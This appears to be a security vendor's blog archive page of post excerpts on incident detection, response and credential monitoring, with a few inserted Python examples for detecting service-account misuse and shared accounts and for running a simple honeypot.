This post is the fourth in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first three, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations], here [/2015/10/29/whether-or-not-siem-died-the-problems-remain], and here [/2015/11/05/investigating-an-incident-doesnt-end-at-the-perimeter]. Nearly a year ago, I likened the incident handling process to continuous flow manufacturing [/2014/12/12/attackers-prey

4 min Incident Response

Investigating An Incident Doesn't End At The Perimeter

This post is the third in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the first two, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations] and here [/2015/10/29/whether-or-not-siem-died-the-problems-remain]. In the second blog of this series [/2015/10/29/whether-or-not-siem-died-the-problems-remain], I touched on the need for solutions more flexible than the traditional SIEM architecture focused prima

5 min SIEM

Whether or Not SIEM Died, the Problems Remain

This post is the second in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. To read the previous, click here [/2015/10/21/search-will-always-be-a-part-of-incident-investigations]. Various security vendors have made very public declarations claiming everything from “SIEM is dead.” to asking if it has merely “lost its magic”. Whatever your stance on SIEM, what's important to recognize is that while technologies may fail to solve a problem, thi

3 min Nexpose

UserInsight Integrates with Nexpose for Total User and Asset Security Visibility

Rapid7's Vulnerability Management and User Behavior Analytics solutions, Nexpose and UserInsight, now integrate to provide visibility and security detection across assets and the users behind them. Combining the pair provides massive time savings and simplifies incident investigations by highlighting risk across your network ecosystem without writing queries or digging through logs. Related Resou

4 min Incident Response

Search Will Always Be A Part of Incident Investigations

This post is the first in a series examining the roles of search and analytics in the incident-detection-to-response lifecycle. Strong data analytics have recently enabled security teams to simplify and speed incident detection and investigation, but at some point of every incident investigation, a search through machine data is nearly always necessary to answer a one-time question before the investigation can be closed. Whether your incident response team is just trying to combat the flood of

4 min Microsoft

From Windows to Office 365: Detecting Intruder Behavior in Microsoft Infrastructures

Microsoft infrastructures have traditionally been on-premises. This is about to change as Microsoft is getting incredible traction with Office 365 deployments. As the corporate infrastructure is changing, many security professionals are concerned about security and transparency of their new strategic cloud services and need to change their incident detection and response programs. This blog post is a quick introduction to this topic. If you're interested in more info, check out our webcast Increa

5 min Phishing

Get Off the Hook: 10 Phishing Countermeasures to Protect Your Organization

The Internet is full of articles on how to tell if an email is phishing, but there seems to be a lack of concise checklists on how to prepare an organization against phishing attacks, so here you go. Because phishing attacks humans and systems alike, the defense should also cover both aspects. None of the following steps is bulletproof, so layering your defenses is important – and having an incident response plan in case someone does get thr

3 min InsightIDR

Top 5 Alternatives For SPAN or Mirror Ports

Don’t want to use SPAN ports, but still need a source of network packets? In this blog post we break down the top 5 alternatives for you to consider.

1 min User Behavior Analytics

[5 Min Demo] Investigate Security Incidents Faster with User Context

Investigating incidents is a tough challenge. It's like solving a 100 piece jigsaw puzzle with a million unarranged pieces on the table. We must first identify what's relevant, and only then start to piece the disparate information together into a coherent picture. This requires a combination of technical expertise and the fortitude to parse often tedious logs, putting strain on the security team. Want to see how we've helped customers speed up incident investigation... by an order of magnitude

2 min Malware

Hammertoss Demonstrates Need for Applying Attacker Knowledge to Behavior Analytics

A recent report on a new type of malware dubbed “Hammertoss” highlights the importance of applying knowledge of attacker methodologies to behavior analytics. As an industry, we get very fixated on the latest intruder tools. The risk here is that we can't see the forest for the trees. To effectively detect intruders, we must look at the entire attack chain and the methods attackers will always use to complete their mi

3 min Incident Detection

All Alerts Are Not Created Equal

In my experience, automated alerts are one of the most challenging, duplicitous factors in security. On the one hand, there is simply too much data for us humans to sift through, so having a system in place to analyze and correlate data automagically is hugely helpful. On the other hand, once the tool has analyzed data and spat out alerts, the security team (or security person) still bears the responsibility of interpreting and reacting to this data, which is fine…so long as the number of aler

9 min Log Management

Q & A from the Incident Response & Investigation Webcast: "Storming the Breach, Part 1: Initial Infection Vector"

The recent webcast “Storming the Breach, Part 1: Initial Infection Vector”, with Incident Response experts Wade Woolwine [/author/wade-woolwine] and Mike Scutt sparked so many great questions from our live attendees that we didn't have time to get through all of them! Our presenters took the time to answer additional questions after the fact... so read on for the overflow Q&A on tips and tricks for

2 min Phishing

Top 3 Takeaways from the "Storming the Breach, Part 1: Initial Infection Vector" Webcast

In the recent Rapid7 webcast, “Storming the Breach, Part 1: Initial Infection Vector”, Incident Response experts Wade Woolwine [/author/wade-woolwine] and Mike Scutt had a technical discussion on investigation methodologies for the 3 most common breach scenarios: spear phishing, browser exploitation, and web server compromise. Their discussion was packed with details and expert tips for investigati

1 min Phishing

Join us at Camp Rapid7: Free Security Learnings All Summer Long

This summer, Rapid7 is hosting a ton of free, educational security content at the Rapid7 Security Summer Camp. Camp Rapid7 is a place where security professionals of all ages (Girls AND Boys Allowed!) can gain knowledge and skill in incident detection and response, cloud security, phishing, threat exposure management, and more. A few of the exciting activities for visitors at Camp Rapid7 [https://information.rapid7

6 min Transportation

Low and Slow: Attackers Easily Hide From Time-Blind Alerts

Many organizations focus their detection strategy almost exclusively on malware, not realizing that attackers don't need it to compromise their networks. When you start to look at the extensive intruder behavior outside of malware, you quickly recognize the massive detection challenges we face today. Not only do these intruders change their techniques when they become easy to detect, but all too much of the detection available depends on events occurring at a single point in time. This inability

1 min Incident Response

How to mitigate the threat of an extortion attempt against your organization

We've had a few conversations with our customers recently who have alerted us to extortion attempts against their organizations. Thankfully, none were successful. This post is to detail the events that have transpired so that you can alert your organizations and increase your odds of not falling victim to this scam: * Attackers will register a domain name similar to yours. For example, the attacker might register when is the legitimate domain * Attackers will target t

6 min Incident Detection

Let's talk about metrics...

Today I read an article on metrics and it was interesting. Here's the link to the original article. I am kind of a metrics geek. When done well, a metrics program can be of extreme value to a security program. However, when done badly, they can cloud your vision and make it difficult to notice that your radar is off by a few degrees. The article addressed severa

2 min Phishing

Top 3 Takeaways from the "Getting One Step Ahead of the Attacker: How to Turn the Tables" Webcast

For too long, attackers have been one step (or leaps) ahead of security teams. They study existing security solutions in the market and identify gaps they can use to their advantage. They use attack methods that are low cost and high return like stolen credentials and phishing, which works more often than not. They bank on security teams being too overwhelmed by security alerts to be able to sift through the noise to detect their presence. In this week's webcast, Matt Hathaway [/author/matt-hat

3 min Incident Response

Detecting Intruders Early Can Ruin Their Business Model

If you look at attackers as faceless, sophisticated digital ninjas, it instills fear, but doesn't really help to stop them. While there are many motivations for attacking an organization and stealing its data, the most frequent are based on money. This is why it sometimes helps to view them as you would any other business: as having costs and needing to generate revenue to survive. Attacker groups are similar to high-tech startups: there is a thriving economy full of people who breach organizati

2 min InsightIDR

Tracking Web Activity by MAC Address

In this blog post we explore the benefit of tracking web activity by MAC address. Learn more.

2 min Incident Response

Top 3 Takeaways from the "Security Pro's Guide to Breach Preparedness and Response" Webcast

In this week's webcast Wade Woolwine [/author/wade-woolwine] and Mike Scutt talked about how to prepare for an incident and be ready to respond effectively when one occurs. Breaches are happening all the time. They vary in size and scope, but will end up affecting every organization in one way or another. Incident preparedness leads to more efficient and streamlined incident response. Read on to learn the top takeaways from Wade and Mike's “Security Pro's Guide to Breach Preparedness and Respons

1 min Incident Detection

#DFIRchat - Join our Incident Response Tweetchat Monday March 9, 3:30pm ET

Who you gonna call? How to work effectively with Incident Response teams and processes - A Tweetchat (#DFIRchat). No matter if you have a semi-formalized process, an internal Incident Response team, or rely on an external partner, when there's a potential crisis on the horizon, there are many questions you need to answer, all while under immense pressure to act — and act quickly. We wanted to explore what Incident Response professionals see as some strategic pitfalls to avoid when investigating inci

2 min Authentication

Top 3 Takeaways from the "Planning for Failure: How to Succeed at Detecting Intruders on your Network" Webcast

Last week, Rick Holland, Principal Analyst at Forrester Research, joined Christian Kirsch [/author/christian-kirsch] to discuss the concept of planning for failure in your security programs by being equipped to detect and investigate effectively when intruders get past your defenses. Read on to learn the top takeaways from their discussion on “Planning for Failure: How to Succeed at Detecting Intruders on your Network [

1 min Events

How to Make the UNITED Security Summit Your Own

At Rapid7's 2015 UNITED Security Summit you can customize your experience beyond general keynotes and expert panels to gain the insight and confidence you need to build, improve, and maintain strong security programs at your organization. Join us at The Seaport Boston Hotel & World Trade Center on June 17-18th and you will earn 16 CPE credits and have the chance to: * Choose sessions from 3 breakout

4 min Incident Response

Preparing for Incident Response

Today, we launched a short Whiteboard Wednesday video aimed at providing a brief overview of how to effectively prepare for an incident. In this post, I'd like to expand on that a little bit by providing some additional concrete steps on how most organizations should be thinking about how preparedness can directly impact incident response program execution during a breach. The first step is going to involve discovery

4 min Incident Response

Remove Your Alert Triage Bottleneck To Speed Response

Recently, I wrote about the two largest incident response bottlenecks [/2014/12/12/attackers-prey-on-incident-response-bottlenecks] behind the massive gap in time to compromise an organization and time it takes incident response teams to verify the true incident and take appropriate action. I then discussed the second bottleneck of incident analysis [/2015/01/23/remove-your-incident-analysis-bottleneck-to-improve-your-time-to-contain], and to close the loop, I want to discuss the first bottlene

4 min Incident Response

Remove Your Incident Analysis Bottleneck To Improve Your Time To Contain

Last month, I wrote about the two largest incident response bottlenecks [/2014/12/12/attackers-prey-on-incident-response-bottlenecks] behind the massive gap in time to compromise an organization and time it takes incident response teams to verify the true incident and take appropriate action. This post is meant to go into much greater detail on the second bottleneck: incident analysis (AKA investigation). Challenge #1: Incident analysis with existing security tools can be very frustrating. In th

3 min Malware

"Skeleton Key" Exhibits Increased Blending Of Credentials And Malware

Dell SecureWorks published a very informative blog this week about a new type of malware they have appropriately labeled “Skeleton Key”. Our community manager quickly wrote a note of appreciation for setting a great example through disclosure and a quick mitigation strategy [/2015/01/14/effective-information-sharing-exposing-skeleton-key?] that every security professional should

4 min Authentication

Patch CVE-2014-6324 To Avoid A Complete Domain Rebuild When UserInsight Detects Its Exploit

On Tuesday, November 18th, Microsoft released an out-of-band security patch affecting any Windows domain controllers that are not running in Azure. I have not yet seen any cute graphics or buzzword names for it, so it will likely be known as MS14-068, CVE-2014-6324, or "that Kerberos vulnerability that is being exploited in the wild to completely take over Windows domains" because it rolls off the tongue a little better. There is a very informative description of the vulnerability, impact, and

2 min Networking

Securing DevOps: Monitoring Development Access to Production Environments

A big factor for securing a DevOps environment is that engineers should not have access to the production environment. This is especially true if the production environment contains sensitive data, such as payment card data, protected health information, or personally identifiable information, because compromised engineering credentials could expose sensitive data and lead to a breach. While this requirement is a security best practice and has found its way into many compliance regulations, it can

3 min Networking

UserInsight Detects Network Zone Access Violations

Information security regulations are often vague and open to some interpretation, but one common theme across most is that you need to separate the systems with critical data from the rest of your network. The vast majority of employees in your organization should never have access to systems that: * process or store payment card data -- PCI DSS * qualify as Critical Cyber Assets (i.e. have a role in the operation of bulk power systems) -- NERC CIP * provide services not needed for intern

3 min Incident Detection

Detecting Compromised Amazon Web Services (AWS) Accounts

As you move more of your critical assets to Amazon Web Services (AWS), you'll need to ensure that only authorized users have access. Three out of four breaches use compromised credentials, yet many companies struggle to detect their use. UserInsight enables organizations to detect compromised credentials, from the endpoint to the cloud. Through its AWS integration, Rapid7 UserInsight monitors all administrator access to Amazon Web Services, so you can detect compromised credentials before they t

3 min Incident Detection

More Efficient Incident Detection and Investigation Saves $400,000 per Year, Says IDC

IDC just published an infographic on how credentials are abused by cyber criminals. These are interesting and important statistics: * 80% of companies will suffer at least one successful attack causing serious harm that requires remediation * 33% will not be able to prevent over half of the attacks These stats explain why many security experts are advising companies to shift their security spending to detection mechanisms instead of relying too heavily on prevention. Measuring incident c

1 min Incident Response

Top 3 Takeaways from the "When Every Minute Counts: Accelerating Incident Investigations" Webcast

In our latest webcast, we heard from Christian Kirsch, Principal Product Marketing Manager at Rapid7, on “When Every Minute Counts: Accelerating Incident Investigations”. In this webcast, Chris spoke about the major challenges incident responders face, and what they can do to tackle these challenges head on and significantly reduce investigation time. Read on to learn t

4 min Incident Response

The Significance of Fast and Organized Tools for Incident Investigations

Incident response processes have become more standardized in the past two decades, but any organization without a dedicated development team has had to design its processes to take available tools into account. I want to talk about incident investigation tools and how they are analogous to those used in the non-"cyber" criminal investigations that we have seen for years on television. There is a point where a security incident investigation gives way to a criminal investigation, due to a crimina

3 min Incident Detection

UserInsight Speeds Investigations with New Interactive Incident Timeline

Rapid7 UserInsight features a new interactive incident timeline, which enables you to quickly understand the context of an incident, determine what happened, and prioritize the appropriate response. With the new capabilities, incident responders can identify indicators of compromise and map a possible attack by correlating events such as authentications, IPS alerts, and vulnerabilities across users, assets and IP addresses. UserInsight is the only user behavior analytics solution [https://www.ra

6 min Incident Detection

Cyber Security Awareness Month: Crisis Response and Communication

Throughout October, Rapid7 has run a series of blog posts designed to help you talk to the C-suite of your organization about security. We've focused on why executives should pay attention [/2014/10/06/cyber-security-awareness-month-taking-it-to-the-c-level-and-beyond], what they specifically need to focus on [/2014/10/17/cyber-security-awareness-month-data-custodianship], some ways to improve organizational security [/2014/10/28/cyber-security-awareness-month-why-your-organization-needs-secur

5 min Incident Response

Noise Canceling Security: Extract More Value From IPS/IDS, Firewalls, and Anti-Virus

Based on a common pain and your positive feedback on last month's blog post entitled "Don't Be Noisy" [/2016/05/02/alert-fatigue-incident-response-teams-stop-listening-to-monitoring-solutions/], we have started significantly expanding the scope of our noise reduction efforts. Rather than reinvent the great technology that intrusion detection/prevention systems (IDS/IPS), firewalls, and anti-virus products offer, we are aiming to provide an understanding of the massive amounts of data produced b

2 min Phishing

Dogfooding at Rapid7: How UserInsight Saved Us from Getting Phished

A lot of companies talk about how they "eat their own dogfood." For those of you unfamiliar with the colloquialism, it means that they use their own products to validate both value and quality. This is a much easier thing to do in high technology than at, well, a dog food manufacturer. I feel that I may have breezed over the fact when I mentioned in a previous UserInsight blog that we test out the noise of an alert by enabling it at Rapid7 (among other ways) before pushing it to our customer bas

2 min Incident Detection

UserInsight Integrates with LogRhythm SIEM to Accelerate Incident Detection and Response

Rapid7 UserInsight finds the attacks you're missing by detecting and investigating indications of compromised users from the endpoint to the cloud. UserInsight now integrates with LogRhythm, one of the leading Gartner-rated SIEMs in the industry. If you have already integrated all of your data sources with LogRhythm, you can now configure UserInsight to consume its data through LogRhythm, significantly simplifying your UserInsight deployment. UserInsight

2 min Authentication

Protect Your Service Accounts: Detecting Service Accounts Authenticating from a New Host

IT professionals set up service accounts to enable automated processes, such as backup services and network scans. In UserInsight, we can give you quick visibility into service accounts by detecting which accounts do not have password expiration enabled. Many UserInsight subscribers love this simple feature, which is available the instant they have integrated their LDAP directory with UserInsight. In addition, UserInsight has several new ways to detect compromised service accounts. To do their
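The two detections described above can be reproduced from a directory export and authentication logs. The following is an added example written for this page, not UserInsight code: it treats any Active Directory account with the "password never expires" bit set in userAccountControl as a service account, then alerts when such an account logs on from a host it has never been seen on before. The directory records and logon events are constructed for illustration; the account and host names are assumptions.

```python
"""Added example (not UserInsight code): identify service accounts from the
directory, then flag a service-account logon from a never-before-seen host."""
from collections import defaultdict

# Active Directory userAccountControl bit for "password never expires".
# Accounts with this bit set are a good first approximation of service accounts.
DONT_EXPIRE_PASSWD = 0x10000
NORMAL_ACCOUNT = 0x0200

# Constructed directory export (attribute names follow AD; values are made up).
DIRECTORY = [
    {"sAMAccountName": "svc_backup",  "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD},
    {"sAMAccountName": "svc_scanner", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD},
    {"sAMAccountName": "jsmith",      "userAccountControl": NORMAL_ACCOUNT},
]

# Constructed logon events, e.g. distilled from Windows event 4624:
# (ISO timestamp, account, host the logon came from).
AUTH_EVENTS = [
    ("2015-03-02T01:00:00", "svc_backup",  "BACKUP01"),
    ("2015-03-03T01:00:00", "svc_backup",  "BACKUP01"),
    ("2015-03-04T01:00:00", "svc_backup",  "BACKUP01"),
    ("2015-03-05T01:00:00", "svc_scanner", "SCAN01"),
    ("2015-03-10T14:22:00", "svc_backup",  "WKSTN-117"),  # new host: should alert
    ("2015-03-10T15:00:00", "jsmith",      "WKSTN-042"),  # not a service account
]


def service_accounts(directory):
    """Accounts whose password never expires (the heuristic the post describes)."""
    return {
        entry["sAMAccountName"]
        for entry in directory
        if entry["userAccountControl"] & DONT_EXPIRE_PASSWD
    }


def detect_new_hosts(events, svc_accounts):
    """Return (timestamp, account, host) for each service-account logon from a
    host that account has not used before. The first host seen for an account
    establishes its baseline and does not alert."""
    seen_hosts = defaultdict(set)  # account -> hosts it has logged on from
    alerts = []
    for ts, account, host in sorted(events):  # ISO timestamps sort lexically
        if account not in svc_accounts:
            continue  # interactive users get different detections
        if seen_hosts[account] and host not in seen_hosts[account]:
            alerts.append((ts, account, host))
        seen_hosts[account].add(host)
    return alerts


if __name__ == "__main__":
    svc = service_accounts(DIRECTORY)
    for alert in detect_new_hosts(AUTH_EVENTS, svc):
        print("ALERT service account on new host:", alert)
```

In production the baseline would be built from a fixed learning window rather than from the first event, and the directory query would be `(userAccountControl:1.2.840.113556.1.4.803:=65536)` against LDAP; both are left out here to keep the logic visible.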

2 min SIEM

Get HP ArcSight Alerts on Compromised Credentials, Phishing Attacks and Suspicious Behavior

If you're using HP ArcSight ESM as your SIEM, you can now add user-based incident detection and response to your bag of tricks. Rapid7 is releasing a new integration between Rapid7 UserInsight and HP ArcSight ESM, which enables you to detect, investigate and respond to security threats targeting a company's users more quickly and effectively. HP ArcSight is

2 min Metasploit

Detecting the Use of Stolen Passwords

Rarely in life will software vendors let you in on some of their secret sauce. Rapid7 believes in information sharing and the open source community, so in that same vein, the UserInsight team decided to write a guide to gathering the right data to fully understand how stolen passwords are being (mis)used in your organization. The result is a Technical Paper called "Why You Need to Detect More Than

2 min Authentication

Top 2 Takeaways from the "Incident Response: Why You Need to Detect More Than Pass the Hash" Webcast

This week's webcast featured Matt Hathaway, Senior Manager of Platform Products at Rapid7, and Jeff Myers, Lead Software Engineer for UserInsight at Rapid7, as they spoke on “Incident Response: Why You Need to Detect More Than Pass the Hash”. This technical webinar emphasized how compromised credentials are a key predatory weapon in the attacker's arsenal, and featured an in-depth discussion of indicators of compro

3 min Authentication

Find the Shared Credentials That Make Security Sad

No matter what risk framework or security standards you hold most dear, I know for sure that you consider users sharing accounts to be a violation of the common sense that is the necessary foundation of any security awareness training. When the UserInsight team set out to identify evasive attacker behaviors like "account impersonation" and "local credential testing" (that I covered in a blog you can read here [/2014/08/19/lateral-movement-not-just-for-t3h-1337-h4x02]), one of the most important
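One way to surface shared accounts from logon data, as an added example written for this page and not UserInsight's own logic: an account used by several people tends to show logons from distinct hosts too close together for one person to have moved between them, or from more hosts than one person plausibly owns. The logon events, account names, hosts and thresholds below are all constructed assumptions.

```python
"""Added example (not UserInsight code): flag accounts that look shared by
more than one person, from interactive logon events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed interactive logon events: (ISO timestamp, account, source host).
LOGONS = [
    ("2014-09-01T08:01:00", "helpdesk", "HD-PC-01"),
    ("2014-09-01T08:03:00", "helpdesk", "HD-PC-02"),   # 2 min later, other host
    ("2014-09-01T08:05:00", "helpdesk", "HD-PC-03"),
    ("2014-09-01T08:07:00", "helpdesk", "HD-PC-04"),
    ("2014-09-01T08:30:00", "acarter",  "WK-ACARTER"),
    ("2014-09-01T12:10:00", "acarter",  "WK-ACARTER"),
    ("2014-09-01T09:00:00", "dlee",     "WK-DLEE"),
    ("2014-09-01T11:04:00", "dlee",     "WK-DLEE-LAPTOP"),  # two devices, hours apart
]


def find_shared_accounts(events, window=timedelta(minutes=10), max_hosts=2):
    """Return {account: [reasons]} for accounts whose logons suggest sharing:
    (a) consecutive logons from different hosts within `window`, or
    (b) more than `max_hosts` distinct source hosts overall.
    Thresholds are assumptions; tune them to the environment."""
    by_account = defaultdict(list)
    for ts, account, host in events:
        by_account[account].append((datetime.fromisoformat(ts), host))

    findings = {}
    for account, logons in by_account.items():
        logons.sort()  # chronological, so adjacent pairs are consecutive logons
        reasons = []

        hosts = {host for _, host in logons}
        if len(hosts) > max_hosts:
            reasons.append(f"{len(hosts)} distinct hosts")

        # Count host switches that happen faster than a person could walk over.
        rapid_switches = sum(
            1
            for (t_prev, h_prev), (t_next, h_next) in zip(logons, logons[1:])
            if h_prev != h_next and t_next - t_prev <= window
        )
        if rapid_switches:
            reasons.append(f"{rapid_switches} host switch(es) within {window}")

        if reasons:
            findings[account] = reasons
    return findings


if __name__ == "__main__":
    for account, reasons in find_shared_accounts(LOGONS).items():
        print(f"possible shared account {account}: {'; '.join(reasons)}")
```

Service accounts (covered in the previous post) should be excluded from this check, since they legitimately authenticate from many hosts; the interesting hits are interactive accounts such as a helpdesk or admin login that several people know the password for.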

2 min Incident Response

Single Pane of Glass Series: FireEye Threat Analytics Platform (TAP)

As UserInsight grows and we look to add value to more incident response teams that have already chosen the solution that serves as their "single pane of glass", this series will update you on the integrations we build to share valuable context with those solutions.

The Solution

While FireEye and Mandiant were separately disrupting the security industry, they obtained a great deal of threat intelligence and indicators of compromise along the way. The FireEye Threat Analytics Platform (TAP for sh

4 min Incident Response

Involve Us to Spend More Time Investigating Incidents

There is a discussion to be had about the active feedback loop that all software vendors need to have with their customers. When we are showing a demo of UserInsight to incident response teams, I commonly hear a skeptical question: "Our environment is unlike any other I have seen. How much of the feature set that you show here can we expect to get?" Here's the thing: Every organization's network is unique. It's this complexity and uniqueness that makes securing an organization so incredibly difficult and al

2 min Honeypots

Like Playing with Honeypots? Stop Playing, Start Using

Honeypots are machines whose only purpose is to entrap attackers who scan or even hack into them. Honeypots are very powerful for detecting incidents because every interaction with them is illegitimate by definition: honeypots do not host legitimate data or services, so there is no reason for a regular user to interact with them. However, honeypots come with one major drawback: a great deal of security professionals have told me that they built a honeypot, played around with it, and eventually
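The property the post relies on, that any connection to a honeypot is suspicious by definition, makes the detection logic almost trivial: there is no allowlist and no baseline, just "someone touched it". The following is an added example written for this page (not a Rapid7 product or any particular honeypot project): a minimal TCP listener that records the source of every connection and the first bytes it sent, and formats each one as an alert ready to forward to a SIEM. The port, addresses and payload in the demo are constructed.

```python
"""Added example (not from the post): a minimal TCP honeypot. Every accepted
connection becomes an event, because no legitimate client has any reason to
connect to it."""
import socket
import threading
from datetime import datetime, timezone


class Honeypot:
    """Listen on a port no real service uses and record every connection."""

    def __init__(self, host="127.0.0.1", port=0):  # port 0: let the OS pick
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(5)
        self.port = self.sock.getsockname()[1]
        self.events = []
        self._lock = threading.Lock()

    def _handle(self, conn, addr):
        # Capture a little of what the client sends (banner grab, probe, etc.),
        # then drop it: the honeypot never offers a real service.
        conn.settimeout(2.0)
        try:
            data = conn.recv(1024)
        except socket.timeout:
            data = b""
        finally:
            conn.close()
        event = {
            "time": datetime.now(timezone.utc).isoformat(timespec="seconds"),
            "src_ip": addr[0],
            "src_port": addr[1],
            "dst_port": self.port,
            "first_bytes": data[:64],
        }
        with self._lock:
            self.events.append(event)

    def serve(self, max_connections=None):
        """Accept connections (forever, or `max_connections` of them)."""
        handled = 0
        while max_connections is None or handled < max_connections:
            conn, addr = self.sock.accept()
            self._handle(conn, addr)
            handled += 1


def alert_line(event):
    """One-line alert suitable for syslog/SIEM forwarding. Severity is high
    for every event: there is no benign interaction with a honeypot."""
    return (f"HONEYPOT sev=high src={event['src_ip']}:{event['src_port']} "
            f"dst=tcp/{event['dst_port']} first_bytes={event['first_bytes']!r}")


def demo():
    """Run the honeypot in a thread, poke it once (constructed probe), and
    return the recorded events."""
    hp = Honeypot()
    server = threading.Thread(target=hp.serve, kwargs={"max_connections": 1}, daemon=True)
    server.start()
    client = socket.create_connection(("127.0.0.1", hp.port))
    client.sendall(b"GET / HTTP/1.0\r\n\r\n")  # constructed probe
    client.close()
    server.join(timeout=5)
    hp.sock.close()
    return hp.events


if __name__ == "__main__":
    for ev in demo():
        print(alert_line(ev))
```

"Start using" in the post's sense means the `alert_line` output goes to the same place as the rest of your detections, so the honeypot is checked by the incident response process rather than by whoever remembers it exists.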

1 min Incident Detection

Come Crash My Party! Your Invitation to Our Summer Series

Hey everyone, it's Michael Santarcangelo, the Security Catalyst, with an invitation to join me and Rapid7 on a journey over the next few weeks. As the value of the systems and information we protect continues to grow, we face attackers that are more organized, and more disciplined. In fact, when we looked at it, breaking down the concepts and elements necessary to be successful when it comes to handling

1 min Incident Response

Top 3 Takeaways from the "Need for Speed: 5 Tips to Accelerate Incident Investigation Time" Webcast

In a thorough and detailed webcast earlier this week, we heard from Michael Belton and Lital Asher-Dotan on the increasingly urgent subject, “Need for Speed: 5 Tips to Accelerate Incident Investigation Time”. Meticulous and successful plans for efficient incident response can make or break an organization after a

2 min Metasploit

Top 4 Takeaways from the "Live Bait: How to Prevent, Detect, and Respond to Phishing Emails" Webcast

In this week's webcast, Lital Asher-Dotan and ckirsch tackled the hot topic, “Live Bait: How to Prevent, Detect, and Respond to Phishing Emails”. Phishing has risen from #9 to #3 in the Verizon Data Breach Investigations Report on the most common attack vectors. Phishing attacks are often successful because i

5 min Log Management

Incident Response is about Where, When, and How

"If and when" is old and busted. "Where, when, and how" are the new hotness. Incidents happen. There will always be a Patient Zero. "Where the incident happened, when you detected the incident, and how you responded" is what I believe matters. I think the general public will appreciate a measured response under attack over our fostering belief in 'perfect defense'. With this in mind, I want to discuss a few thoughts prompted by eBay's response to this compromise.

Scoping is hard

Incident Handlers le

2 min Incident Response

Cyber security around the world - 18/3/14 - UK Cyber Security Strategy

With so much happening in cyber security around the world lately, we're highlighting some of the interesting stories each week from across Europe, Middle East, Africa and Asia Pacific. This week, we're in the UK to look at a key component of the government's Cyber Security Strategy… United Kingdom Over a year ago, the UK government announced plans for a new national Computer Emergency Response Team (CERT) [

3 min Incident Detection

Finding Out What Users are Doing on Your Network

One of the most common questions in IT is how to find out what users are doing on a network. We break down the common ways to monitor users on your network.

3 min PCI

PCI 30 seconds newsletter #19 - Your PCI Logbook - What is required in terms of log management?

P > D + R is a well-known principle in security. It means that the Protective measures in place must be strong enough to resist for longer than the time required to Detect that something wrong is happening and then React. For example, your door must be strong enough to keep a malicious individual out for at least the amount of time required to detect the incident, alert the police, and have them arrive on site. In this context, log management plays a specific role. It help